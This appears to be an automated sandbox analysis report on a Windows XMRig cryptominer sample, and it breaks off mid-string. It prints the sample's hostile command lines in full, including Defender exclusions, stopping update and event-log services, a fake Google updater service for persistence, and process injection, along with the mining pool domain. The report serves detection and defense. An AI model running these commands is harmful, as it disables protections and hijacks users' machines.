
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1549101
MD5: fb788c569d7b0acf5546340aa85cd0a6
SHA1: dcbf06332153a462e67e27c74929af46a5a83d39
SHA256: d6787107b40d3d9c65b07aea10e10fa14ff04efbb497b6caf5854812d8e7648b
Tags: exe, user-Bitsight

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB788C569D7B0ACF5546340AA85CD0A6)
    • powershell.exe (PID: 6696 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4500 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1396 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6476 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5812 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4944 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6696 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6764 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5480 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2504 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6596 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5812 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6716 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7032 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6788 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6376 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1188 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 6792 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: FB788C569D7B0ACF5546340AA85CD0A6)
    • powershell.exe (PID: 7108 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6764 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6376 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1396 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7108 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5000 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6592 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7032 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2368 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5780 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6712 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 2500 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 5904 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7180 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
64.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
64.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
64.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
64.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Change of critical system settings

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5480, ProcessName: powercfg.exe

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6716, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 6788, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6376, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T10:37:17.785545+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49732 | TCP
2024-11-05T10:37:55.685944+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49743 | TCP


AV Detection

Source: C:\ProgramData\Google\Chrome\updater.exe, ReversingLabs: Detection: 50%
Source: file.exe, ReversingLabs: Detection: 50%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match, File source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: dialer.exe, String found in binary or memory: cryptonight-monerov7
Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe, Code function: 30_2_00000225DC64DCE0 FindFirstFileExW, 30_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe, Code function: 30_2_00000225DC6ADCE0 FindFirstFileExW, 30_2_00000225DC6ADCE0
Source: C:\Windows\System32\lsass.exe, Code function: 36_2_00000202C0AEDCE0 FindFirstFileExW, 36_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe, Code function: 39_2_000002A66130DCE0 FindFirstFileExW, 39_2_000002A66130DCE0
Source: C:\Windows\System32\dwm.exe, Code function: 40_2_000002BAAEDBDCE0 FindFirstFileExW, 40_2_000002BAAEDBDCE0
Source: C:\Windows\System32\svchost.exe, Code function: 65_2_0000026A879CDCE0 FindFirstFileExW, 65_2_0000026A879CDCE0
Source: C:\Windows\System32\svchost.exe, Code function: 66_2_00000179537ADCE0 FindFirstFileExW, 66_2_00000179537ADCE0
Source: C:\Windows\System32\svchost.exe, Code function: 67_2_000002295D56DCE0 FindFirstFileExW, 67_2_000002295D56DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 68_2_0000025306E6DCE0 FindFirstFileExW, 68_2_0000025306E6DCE0
Source: C:\Windows\System32\svchost.exe, Code function: 69_2_000001845B3ADCE0 FindFirstFileExW, 69_2_000001845B3ADCE0
Source: global traffic, TCP traffic: 192.168.2.4:49730 -> 149.102.143.109:20128
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49732
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49743
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: gulf.moneroocean.stream
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000024.00000002.3073692419.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
